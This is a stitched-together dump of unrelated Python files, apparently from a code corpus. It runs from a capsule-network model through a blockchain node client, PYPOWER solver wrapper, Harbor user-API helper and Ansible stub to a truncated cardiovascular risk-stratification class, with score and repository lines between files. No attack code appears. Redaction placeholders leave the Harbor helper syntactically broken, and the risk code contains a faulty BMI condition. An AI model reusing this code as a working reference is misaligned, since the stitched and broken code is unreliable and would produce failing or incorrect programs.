layers.BACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.BACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.BACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) ## Main Capsule Layers # concurrent routing if not self.sequential_routing: # first iteration # perform initilialization for the capsule values as single forward passing capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(_val, 0) capsule_values.append(_val) # get the capsule value for next layer # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): _capsule_values = [init_capsule_value] for i in range(len(self.capsule_layers)): _val = self.capsule_layers[i].forward(capsule_values[i], n, capsule_values[i+1]) _capsule_values.append(_val) capsule_values = _capsule_values # sequential routing else: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): # first iteration __val = self.capsule_layers[i].forward(_val, 0) # second to t iterations # perform the routing between capsule layers for n in range(self.num_routing-1): __val = self.capsule_layers[i].forward(_val, n, __val) _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out # Capsule model with bilinear routing with dynamic routing class CapsDBAModel(nn.Module): def __init__(self, image_dim_size, params, dataset, backbone, dp, num_routing, sequential_routing=True): super(CapsDBAModel, self).__init__() #### Parameters self.sequential_routing = sequential_routing ## Primary Capsule Layer self.pc_num_caps = params['primary_capsules']['num_caps'] self.pc_caps_dim = params['primary_capsules']['caps_dim'] self.pc_output_dim = params['primary_capsules']['out_img_size'] ## General self.num_routing = num_routing # >3 may cause slow converging #### Building Networks ## Backbone (before capsule) if backbone == 'simple': self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['kernel_size'], params['backbone']['stride'], params['backbone']['padding']) elif backbone == 'resnet': # Ouputs 16 X 16 X 128 dim if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset: print("Using CIFAR backbone") self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) else: print("Using New ResNet Backbone") self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'], params['backbone']['output_dim'], params['backbone']['stride']) ## Primary Capsule Layer (a single CNN) self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'], out_channels=params['primary_capsules']['num_caps'] *\ params['primary_capsules']['caps_dim'], kernel_size=params['primary_capsules']['kernel_size'], stride=params['primary_capsules']['stride'], padding=params['primary_capsules']['padding'], bias=False) #self.pc_layer = nn.Sequential() self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim']) ## Main Capsule Layers self.capsule_layers = nn.ModuleList([]) for i in range(len(params['capsules'])): if params['capsules'][i]['type'] == 'CONV': in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \ params['capsules'][i-1]['num_caps'] in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \ params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.DBACapsuleCONV(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], kernel_size=params['capsules'][i]['kernel_size'], stride=params['capsules'][i]['stride'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp, coordinate_add=False, padding=params['capsules'][i].get('padding', None) ) ) elif params['capsules'][i]['type'] == 'FC': if i == 0: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] elif params['capsules'][i-1]['type'] == 'FC': in_n_caps = params['capsules'][i-1]['num_caps'] in_d_caps = params['capsules'][i-1]['caps_dim'] elif params['capsules'][i-1]['type'] == 'CONV': in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\ params['capsules'][i-1]['out_img_size'] in_d_caps = params['capsules'][i-1]['caps_dim'] self.capsule_layers.append( layers.DBACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['capsules'][i]['num_caps'], out_d_capsules=params['capsules'][i]['caps_dim'], matrix_pose=params['capsules'][i]['matrix_pose'], dp=dp ) ) ## Class Capsule Layer if not len(params['capsules'])==0: if params['capsules'][-1]['type'] == 'FC': in_n_caps = params['capsules'][-1]['num_caps'] in_d_caps = params['capsules'][-1]['caps_dim'] elif params['capsules'][-1]['type'] == 'CONV': in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\ params['capsules'][-1]['out_img_size'] in_d_caps = params['capsules'][-1]['caps_dim'] else: in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\ params['primary_capsules']['out_img_size'] in_d_caps = params['primary_capsules']['caps_dim'] self.capsule_layers.append( layers.DBACapsuleFC(in_n_capsules=in_n_caps, in_d_capsules=in_d_caps, out_n_capsules=params['class_capsules']['num_caps'], out_d_capsules=params['class_capsules']['caps_dim'], matrix_pose=params['class_capsules']['matrix_pose'], dp=dp ) ) ## After Capsule # fixed classifier for all class capsules self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1) # different classifier for different capsules #self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim'])) def forward(self, x, lbl_1=None, lbl_2=None): #### Forward Pass ## Backbone (before capsule) c = self.pre_caps(x) # print(c.shape) # print("Backbone: ", c.shape) ## Primary Capsule Layer (a single CNN) u = self.pc_layer(c) # torch.Size([100, 512, 14, 14]) u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512 # print("Shape:", u.shape) u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16 u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16 # init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u) init_capsule_value = u ## Main Capsule Layers # Sequetial routing only if self.sequential_routing: capsule_values, _val = [init_capsule_value], init_capsule_value for i in range(len(self.capsule_layers)): routing_coeff = None for n in range(self.num_routing): # print("Routing num ", n) new_coeff, __val = self.capsule_layers[i].forward(_val, n, routing_coeff) routing_coeff = new_coeff _val = __val capsule_values.append(_val) ## After Capsule out = capsule_values[-1] # print("out shape, ", out.shape) out = self.final_fc(out) # fixed classifier for all capsules # print("classifier shape, ", out.shape) out = out.squeeze(1) # fixed classifier for all capsules out = out.squeeze(2) out = out.squeeze(1) #out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules # print("Final shape, ", out.shape) return out
1.726563
2
thenewboston_node/core/clients/node.py
fonar/thenewboston-node
0
12749867
import json import logging from typing import Generator, Optional, Type, TypeVar from urllib.parse import urlencode, urljoin from urllib.request import urlopen import requests from thenewboston_node.business_logic.blockchain.base import BlockchainBase from thenewboston_node.business_logic.blockchain.file_blockchain.sources import URLBlockSource from thenewboston_node.business_logic.models import Block, BlockchainState from thenewboston_node.business_logic.utils.blockchain_state import read_blockchain_state_file_from_source from thenewboston_node.core.utils.types import hexstr logger = logging.getLogger(__name__) T = TypeVar('T', bound='NodeClient') def setdefault_if_not_none(dict_, key, value): if value is not None: dict_.setdefault(key, value) def requests_get(url): # We need this function to mock it easier for unittests return requests.get(url) class NodeClient: _instance = None @classmethod def get_instance(cls: Type[T]) -> T: instance = cls._instance if not instance: cls._instance = instance = cls() return instance @staticmethod def http_get(network_address, resource, *, parameters=None, should_raise=True): # We do not use reverse() because client must be framework agnostic url = urljoin(network_address, f'/api/v1/{resource}/') if parameters: url += '?' + urlencode(parameters) try: response = requests_get(url) except Exception: logger.warning('Could not GET %s', url, exc_info=True) if should_raise: raise else: return None if should_raise: response.raise_for_status() else: status_code = response.status_code if status_code != requests.codes.ok: logger.warning('Could not GET %s: HTTP%s: %s', url, status_code, response.text) return None try: data = response.json() except json.decoder.JSONDecodeError: if should_raise: raise else: logger.warning('Non-JSON response GET %s: %s', url, response.text, exc_info=True) return None return data def list_resource( self, network_address, resource, *, offset=None, limit=None, ordering=None, parameters=None, should_raise=True ): parameters = parameters or {} setdefault_if_not_none(parameters, 'offset', offset) setdefault_if_not_none(parameters, 'limit', limit) setdefault_if_not_none(parameters, 'ordering', ordering) return self.http_get(network_address, resource, parameters=parameters, should_raise=should_raise) def get_latest_blockchain_state_meta_by_network_address(self, network_address) -> Optional[dict]: data = self.list_resource( network_address, 'blockchain-states-meta', limit=1, ordering='-last_block_number', should_raise=False ) if not data: return None results = data['results'] if not results: return None return results[0] def get_latest_blockchain_state_binary_by_network_address(self, network_address) -> Optional[tuple[bytes, str]]: meta = self.get_latest_blockchain_state_meta_by_network_address(network_address) if meta is None: return None for url in meta['urls']: logger.debug('Trying to get blockchain state binary from %s', url) try: with urlopen(url) as fo: return fo.read(), url except IOError: logger.warning('Unable to read blockchain state from %s', url, exc_info=True) continue return None def get_latest_blockchain_state_by_network_address(self, network_address) -> Optional[BlockchainState]: meta = self.get_latest_blockchain_state_meta_by_network_address(network_address) if meta is None: return None for url in meta['urls']: try: return read_blockchain_state_file_from_source(url) except IOError: logger.warning('Unable to read blockchain state from %s', url, exc_info=True) continue logger.warning('Could not read latest blockchain state from node: %s', network_address) return None def get_latest_blockchain_state_meta_by_network_addresses(self, network_addresses) -> Optional[dict]: for network_address in network_addresses: # TODO(dmu) CRITICAL: Try another network_address only if this one is unavailable return self.get_latest_blockchain_state_meta_by_network_address(network_address) return None def list_block_chunks_meta_by_network_address( self, network_address, from_block_number=None, to_block_number=None, offset=None, limit=None, direction=1 ): assert direction in (1, -1) parameters = {} setdefault_if_not_none(parameters, 'from_block_number', from_block_number) setdefault_if_not_none(parameters, 'to_block_number', to_block_number) data = self.list_resource( network_address, 'block-chunks-meta', offset=offset, limit=limit, ordering='start_block_number' if direction == 1 else '-start_block_number', parameters=parameters, should_raise=False ) return None if data is None else data['results'] def get_latest_block_chunk_meta_by_network_address(self, network_address) -> Optional[dict]: results = self.list_block_chunks_meta_by_network_address(network_address, limit=1, direction=-1) return results[0] if results else None def get_last_block_number_by_network_address(self, network_address): block_chunk_meta = self.get_latest_block_chunk_meta_by_network_address(network_address) if block_chunk_meta: return block_chunk_meta['end_block_number'] return None def get_latest_blockchain_state_meta_by_node_identifier(self, blockchain: BlockchainBase, node_identifier: hexstr) -> Optional[dict]: node = blockchain.get_node_by_identifier(node_identifier) if node is None: return None network_addresses = node.network_addresses if not network_addresses: return None return self.get_latest_blockchain_state_meta_by_network_addresses(network_addresses) def yield_blocks_slice(self, network_address, from_block_number: int, to_block_number: int) -> Generator[Block, None, None]: # TODO(dmu) MEDIUM: Consider improvements for network failovers # by the moment of downloading the last (incomplete) block chunk its name may change # (because of becoming complete) therefore we retry last_block_number = None for _ in range(2): block_chunks = self.list_block_chunks_meta_by_network_address( network_address, from_block_number=from_block_number, to_block_number=to_block_number ) for block_chunk in block_chunks: # TODO(dmu) HIGH: Support download from more than one URL url = block_chunk['urls'][0] source = URLBlockSource(url) try: source.force_read() except Exception: logger.warning('Error trying to download %s', url) break for block in URLBlockSource(url): block_number = block.get_block_number() if from_block_number is not None and block_number < from_block_number: # TODO(dmu) LOW: This can be optimized by applying the codition only to first block chunk # (be careful first block chunk may be also the last) # skip not requested block continue if last_block_number is not None and block_number <= last_block_number: # TODO(dmu) LOW: This maybe excessive precaution # We have seen this block already continue if to_block_number is not None and to_block_number < block_number: return yield block last_block_number = block_number if last_block_number is None: continue assert to_block_number is None or last_block_number <= to_block_number if to_block_number is not None and last_block_number >= to_block_number: # defensive programming break from_block_number = last_block_number + 1
1.820313
2
datasetsnx/dataset.py
ckxy/part-of-hitogata
0
12749995
<gh_stars>0 import torch.utils.data as data from .bamboo import Bamboo from .readers import * class Dataset(data.Dataset): def __init__(self, cfg, **kwargs): self.cfg = cfg self.use_pil = cfg.use_pil if cfg.use_pil else True k, v = cfg.reader self.reader = eval(k)(**v) if cfg.internodes: self.bamboo = Bamboo(cfg.internodes) else: self.bamboo = Bamboo([]) self.data_lines, self.info = self.reader.get_dataset_info() self.get_data_info_fn = self.reader.get_data_info if 0 < self.cfg.max_size < len(self.data_lines): self.data_lines = self.data_lines[:self.cfg.max_size] def __getitem__(self, index): data_dict = dict(reader=self.reader, index=index, len_data_lines=len(self)) data_dict = self.bamboo(data_dict) # data_dict.pop('len_data_lines') return data_dict def get_data_info(self, index): return self.get_data_info_fn(index) def __len__(self): return len(self.data_lines) def __repr__(self): split_str = self.bamboo.__repr__().split('\n') bamboo_str = split_str[0] for i in range(1, len(split_str)): bamboo_str += '\n ' + split_str[i] return 'Dataset(\n len: {}\n reader: {}\n bamboo: {} \n)'.format(len(self), self.reader.__repr__(), bamboo_str)
1.9375
2
applied_python/applied_python/lib/python2.7/site-packages/ansible/modules/core/windows/win_service.py
mith1979/ansible_automation
1
12750123
<reponame>mith1979/ansible_automation<filename>applied_python/applied_python/lib/python2.7/site-packages/ansible/modules/core/windows/win_service.py #!/usr/bin/python # -*- coding: utf-8 -*- # (c) 2014, <NAME> <<EMAIL>> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # this is a windows documentation stub. actual code lives in the .ps1 # file of the same name DOCUMENTATION = ''' --- module: win_service version_added: "1.7" short_description: Manages Windows services description: - Manages Windows services options: name: description: - Name of the service required: true default: null aliases: [] start_mode: description: - Set the startup type for the service required: false choices: - auto - manual - disabled state: description: - C(started)/C(stopped) are idempotent actions that will not run commands unless necessary. C(restarted) will always bounce the service. required: false choices: - started - stopped - restarted default: null aliases: [] author: <NAME> ''' EXAMPLES = ''' # Restart a service win_service: name: spooler state: restarted # Set service startup mode to auto and ensure it is started win_service: name: spooler start_mode: auto state: started '''
1.304688
1
pandapower/pypower/qps_pypower.py
yougnen/pandapower
104
12750251
# Copyright (c) 1996-2015 PSERC. All rights reserved. # Use of this source code is governed by a BSD-style # license that can be found in the LICENSE file. """Quadratic Program Solver for PYPOWER. """ import sys from pandapower.pypower.qps_pips import qps_pips #from pandapower.pypower.qps_ipopt import qps_ipopt #from pandapower.pypower.qps_cplex import qps_cplex #from pandapower.pypower.qps_mosek import qps_mosek #from pandapower.pypower.qps_gurobi import qps_gurobi from pandapower.pypower.util import have_fcn def qps_pypower(H, c=None, A=None, l=None, u=None, xmin=None, xmax=None, x0=None, opt=None): """Quadratic Program Solver for PYPOWER. A common wrapper function for various QP solvers. Solves the following QP (quadratic programming) problem:: min 1/2 x'*H*x + c'*x x subject to:: l <= A*x <= u (linear constraints) xmin <= x <= xmax (variable bounds) Inputs (all optional except C{H}, C{c}, C{A} and C{l}): - C{H} : matrix (possibly sparse) of quadratic cost coefficients - C{c} : vector of linear cost coefficients - C{A, l, u} : define the optional linear constraints. Default values for the elements of C{l} and C{u} are -Inf and Inf, respectively. - C{xmin}, C{xmax} : optional lower and upper bounds on the C{x} variables, defaults are -Inf and Inf, respectively. - C{x0} : optional starting value of optimization vector C{x} - C{opt} : optional options structure with the following fields, all of which are also optional (default values shown in parentheses) - C{alg} (0) - determines which solver to use - 0 = automatic, first available of BPMPD_MEX, CPLEX, Gurobi, PIPS - 100 = BPMPD_MEX - 200 = PIPS, Python Interior Point Solver pure Python implementation of a primal-dual interior point method - 250 = PIPS-sc, a step controlled variant of PIPS - 300 = Optimization Toolbox, QUADPROG or LINPROG - 400 = IPOPT - 500 = CPLEX - 600 = MOSEK - 700 = Gurobi - C{verbose} (0) - controls level of progress output displayed - 0 = no progress output - 1 = some progress output - 2 = verbose progress output - C{max_it} (0) - maximum number of iterations allowed - 0 = use algorithm default - C{bp_opt} - options vector for BP - C{cplex_opt} - options dict for CPLEX - C{grb_opt} - options dict for gurobipy - C{ipopt_opt} - options dict for IPOPT - C{pips_opt} - options dict for L{qps_pips} - C{mosek_opt} - options dict for MOSEK - C{ot_opt} - options dict for QUADPROG/LINPROG - C{problem} : The inputs can alternatively be supplied in a single C{problem} dict with fields corresponding to the input arguments described above: C{H, c, A, l, u, xmin, xmax, x0, opt} Outputs: - C{x} : solution vector - C{f} : final objective function value - C{exitflag} : exit flag - 1 = converged - 0 or negative values = algorithm specific failure codes - C{output} : output struct with the following fields: - C{alg} - algorithm code of solver used - (others) - algorithm specific fields - C{lmbda} : dict containing the Langrange and Kuhn-Tucker multipliers on the constraints, with fields: - C{mu_l} - lower (left-hand) limit on linear constraints - C{mu_u} - upper (right-hand) limit on linear constraints - C{lower} - lower bound on optimization variables - C{upper} - upper bound on optimization variables Example from U{http://www.uc.edu/sashtml/iml/chap8/sect12.htm}: >>> from numpy import array, zeros, Inf >>> from scipy.sparse import csr_matrix >>> H = csr_matrix(array([[1003.1, 4.3, 6.3, 5.9], ... [4.3, 2.2, 2.1, 3.9], ... [6.3, 2.1, 3.5, 4.8], ... [5.9, 3.9, 4.8, 10 ]])) >>> c = zeros(4) >>> A = csr_matrix(array([[1, 1, 1, 1 ], ... [0.17, 0.11, 0.10, 0.18]])) >>> l = array([1, 0.10]) >>> u = array([1, Inf]) >>> xmin = zeros(4) >>> xmax = None >>> x0 = array([1, 0, 0, 1]) >>> solution = qps_pips(H, c, A, l, u, xmin, xmax, x0) >>> round(solution["f"], 11) == 1.09666678128 True >>> solution["converged"] True >>> solution["output"]["iterations"] 10 @author: <NAME> (PSERC Cornell) """ if opt is None: opt = {} # if x0 is None: # x0 = array([]) # if xmax is None: # xmax = array([]) # if xmin is None: # xmin = array([]) ## default options if 'alg' in opt: alg = opt['alg'] else: alg = 0 if 'verbose' in opt: verbose = opt['verbose'] else: verbose = 0 ##----- call the appropriate solver ----- # if alg == 0 or alg == 200 or alg == 250: ## use MIPS or sc-MIPS ## set up options if 'pips_opt' in opt: pips_opt = opt['pips_opt'] else: pips_opt = {} if 'max_it' in opt: pips_opt['max_it'] = opt['max_it'] if alg == 200: pips_opt['step_control'] = False else: pips_opt['step_control'] = True pips_opt['verbose'] = verbose ## call solver x, f, eflag, output, lmbda = \ qps_pips(H, c, A, l, u, xmin, xmax, x0, pips_opt) # elif alg == 400: ## use IPOPT # x, f, eflag, output, lmbda = \ # qps_ipopt(H, c, A, l, u, xmin, xmax, x0, opt) # elif alg == 500: ## use CPLEX # x, f, eflag, output, lmbda = \ # qps_cplex(H, c, A, l, u, xmin, xmax, x0, opt) # elif alg == 600: ## use MOSEK # x, f, eflag, output, lmbda = \ # qps_mosek(H, c, A, l, u, xmin, xmax, x0, opt) # elif 700: ## use Gurobi # x, f, eflag, output, lmbda = \ # qps_gurobi(H, c, A, l, u, xmin, xmax, x0, opt) # else: # print('qps_pypower: {} is not a valid algorithm code\n'.format(alg)) if 'alg' not in output: output['alg'] = alg return x, f, eflag, output, lmbda
2.1875
2
LeetCode/Meeting Rooms II - Heap.py
UtkarshPathrabe/Competitive-Coding
13
12750379
class Solution: def minMeetingRooms(self, intervals: List[List[int]]) -> int: if not intervals: return 0 intervals.sort(key = lambda x : x[0]) occupiedRooms = [] heappush(occupiedRooms, intervals[0][1]) for interval in intervals[1:]: if occupiedRooms[0] <= interval[0]: heappop(occupiedRooms) heappush(occupiedRooms, interval[1]) return len(occupiedRooms)
1.851563
2
psana/psana/xtcav/examples/ex-ipython.py
JBlaschke/lcls2
16
12750507
""" to research dataset and event-loop object in ipython """ from psana.pyalgos.generic.NDArrUtils import print_ndarr from psana import DataSource ds = DataSource(files='/reg/g/psdm/detector/data2_test/xtc/data-amox23616-r0104-e000010-xtcav.xtc2') orun = next(ds.runs()) det = orun.Detector('xtcav') print('test_xtcav_data expt: %s runnum: %d\n' % (orun.expt, orun.runnum)) for nev,evt in enumerate(orun.events()): if nev>10 : break print('Event %03d'%nev, end='') #print_ndarr(det.raw.array(evt), ' det.raw.array(evt):') print_ndarr(det.raw(evt), ' det.raw(evt):') #print('XXXXX', evt._dgrams[0].xtcav[0].raw.raw) #----------
1.6875
2
tests/apitests/python/library/user.py
mytting/harbor-arm64
5
12750635
<filename>tests/apitests/python/library/user.py # -*- coding: utf-8 -*- import base import swagger_client class User(base.Base): def create_user(self, name=None, email = None, user_password=<PASSWORD>, realname = None, role_id = None, **kwargs): if name is None: name = base._random_name("user") if realname is None: realname = base._random_name("realname") if email is None: email = '%<EMAIL>' % (realname,"vmware") if user_password is None: user_password = "<PASSWORD>" if role_id is None: role_id = 0 client = self._get_client(**kwargs) user = swagger_client.User(username = name, email = email, password = <PASSWORD>, realname = realname, role_id = role_id) _, status_code, header = client.users_post_with_http_info(user) base._assert_status_code(201, status_code) return base._get_id_from_header(header), name def get_users(self, username=None, email=None, page=None, page_size=None, **kwargs): client = self._get_client(**kwargs) params={} if username is not None: params["username"] = username if email is not None: params["email"] = email if page is not None: params["page"] = page if page_size is not None: params["page_size"] = page_size data, status_code, _ = client.users_get_with_http_info(**params) base._assert_status_code(200, status_code) return data def get_user(self, user_id, **kwargs): client = self._get_client(**kwargs) data, status_code, _ = client.users_user_id_get_with_http_info(user_id) base._assert_status_code(200, status_code) return data def get_user_current(self, **kwargs): client = self._get_client(**kwargs) data, status_code, _ = client.users_current_get_with_http_info() base._assert_status_code(200, status_code) return data def delete_user(self, user_id, expect_status_code = 200, **kwargs): client = self._get_client(**kwargs) _, status_code, _ = client.users_user_id_delete_with_http_info(user_id) base._assert_status_code(expect_status_code, status_code) return user_id def update_user_pwd(self, user_id, new_password=<PASSWORD>, old_password=<PASSWORD>, **kwargs): if old_password is None: old_password = "" password = <PASSWORD>(<PASSWORD>, <PASSWORD>) client = self._get_client(**kwargs) _, status_code, _ = client.users_user_id_password_put_with_http_info(user_id, password) base._assert_status_code(200, status_code) return user_id def update_user_profile(self, user_id, email=None, realname=None, comment=None, **kwargs): client = self._get_client(**kwargs) user_rofile = swagger_client.UserProfile(email, realname, comment) _, status_code, _ = client.users_user_id_put_with_http_info(user_id, user_rofile) base._assert_status_code(200, status_code) return user_id def update_user_role_as_sysadmin(self, user_id, IsAdmin, **kwargs): client = self._get_client(**kwargs) has_admin_role = swagger_client.HasAdminRole(IsAdmin) _, status_code, _ = client.users_user_id_sysadmin_put_with_http_info(user_id, has_admin_role) base._assert_status_code(200, status_code) return user_id
1.492188
1
neorl/benchmarks/__init__.py
XuboGU/neorl
1
12750763
<reponame>XuboGU/neorl<gh_stars>1-10 def bench_2dplot(function, domain=(-100,100), points=30, savepng=None): """ Creates a 2D surface plot of a function. Args: function (function): The objective function to be called at each point. domain (num, num): The inclusive (min, max) domain for each dimension. points (int): The number of points to discretize in x and y dimensions. savepng (str): save png file for the plot """ from mpl_toolkits.mplot3d import Axes3D # <--- This is important for 3d plotting import matplotlib.pyplot as plt import numpy as np try: dimension=2 # create points^2 tuples of (x,y) and populate z xys = np.linspace(domain[0], domain[1], points) xys = np.transpose([np.tile(xys, len(xys)), np.repeat(xys, len(xys))]) zs = np.zeros(points*points) if dimension > 2: # concatenate remaining zeros tail = np.zeros(dimension - 2) for i in range(0, xys.shape[0]): zs[i] = function(np.concatenate([xys[i], tail])) else: for i in range(0, xys.shape[0]): zs[i] = function(xys[i]) # create the plot ax = plt.axes(projection='3d') X = xys[:,0].reshape((points, points)) Y = xys[:,1].reshape((points, points)) Z = zs.reshape((points, points)) ax.plot_surface(X, Y, Z, cmap='ocean', edgecolor='none') ax.set_title(function.__name__) ax.set_xlabel('x') ax.set_ylabel('y') ax.set_zlabel('z') if savepng: plt.savefig(savepng, dpi=200, format='png') plt.show() except: raise Exception ('--error: Plotting fails, if you use CEC17, then f11-f20, f29, f30 are not defined for d=2 dimensions')
2.65625
3
risk/risk_stratification.py
chandojo/ExerciseCoachTools
0
12750891
from validation.value_validation import ValidateValue def risk_classification(patient): classification = RiskFactorAssessment(patient).result_risk_classification() return classification def total_risk_factors(patient): total = RiskFactorAssessment(patient).net_risk_factors() return total class Patient(object): def __init__(self, sex, age, smoker, sedentary, bmi, waist_girth, male_family_death_before_55, female_family_death_before_65, systolic, diastolic, hypertensive, ldl, hdl, using_lipid_lowering_medication, cholesterol, fasting_glucose, oral_glucose_tolerance): self._sex = ValidateValue(sex).valueIsMaleFemale() self._age = ValidateValue(age).valueIsPositiveInteger() self._smoker = ValidateValue(smoker).valueIsYesNo() self._sedentary = ValidateValue(sedentary).valueIsYesNo() self._bmi = ValidateValue(bmi).valueIsPositiveInteger() self._waist_girth = ValidateValue(waist_girth).valueIsPositiveInteger() self._male_family_death_before_55 = ValidateValue(male_family_death_before_55).valueIsYesNo() self._female_family_death_before_65 = ValidateValue(female_family_death_before_65).valueIsYesNo() self._systolic = ValidateValue(systolic).valueIsPositiveInteger() self._diastolic = ValidateValue(diastolic).valueIsPositiveInteger() self._hypertensive = ValidateValue(hypertensive).valueIsYesNo() self._ldl = ValidateValue(ldl).valueIsPositiveInteger() self._hdl = ValidateValue(hdl).valueIsPositiveInteger() self._using_lipid_lowering_medication = ValidateValue(using_lipid_lowering_medication).valueIsYesNo() self._cholesterol = ValidateValue(cholesterol).valueIsPositiveInteger() self._fasting_glucose = ValidateValue(fasting_glucose).valueIsPositiveInteger() self._oral_glucose_tolerance = ValidateValue(oral_glucose_tolerance).valueIsPositiveInteger() class RiskFactorAssessment(object): def __init__(self, patient): self._patient = patient def result_risk_classification(self): classification = RiskFactorAssessmentClassification().patient_risk_classification(self.net_risk_factors()) return classification def net_risk_factors(self): total = self._get_risk_factor_count() - self._get_negative_risk_factor_count() return total def _get_risk_factor_count(self): _count_risk_factors = [ self._is_age_risk(), self._is_obesity_risk(), self._patient._smoker, self._patient._sedentary, self._is_familial_risk(), self._is_systolic_risk(), self._is_diastolic_risk(), self._patient._hypertensive, self._is_dyslipidemia_risk(), self._is_pre_diabetes_risk() ] return _count_risk_factors.count(True) def _get_negative_risk_factor_count(self): _count_negative_risk_factor = [ self._is_hdl_negative_risk() ] return _count_negative_risk_factor.count(True) def _is_obesity_risk(self): if self._patient._bmi and self._patient._waist_girth == 0: return False elif self._patient._bmi > 30: return True elif self._patient._waist_girth > 40 and self._patient._sex == 'male' or self._patient._waist_girth > 35 and self._patient._sex == 'female': return True else: return False def _is_age_risk(self): if (self._patient._sex == "male" and self._patient._age >= 45) or (self._patient._sex == "female" and self._patient._age >=55): return True else: return False def _is_familial_risk(self): if self._patient._male_family_death_before_55 == True or self._patient._female_family_death_before_65 == True: return True else: return False def _is_systolic_risk(self): if self._patient._systolic >= 120: 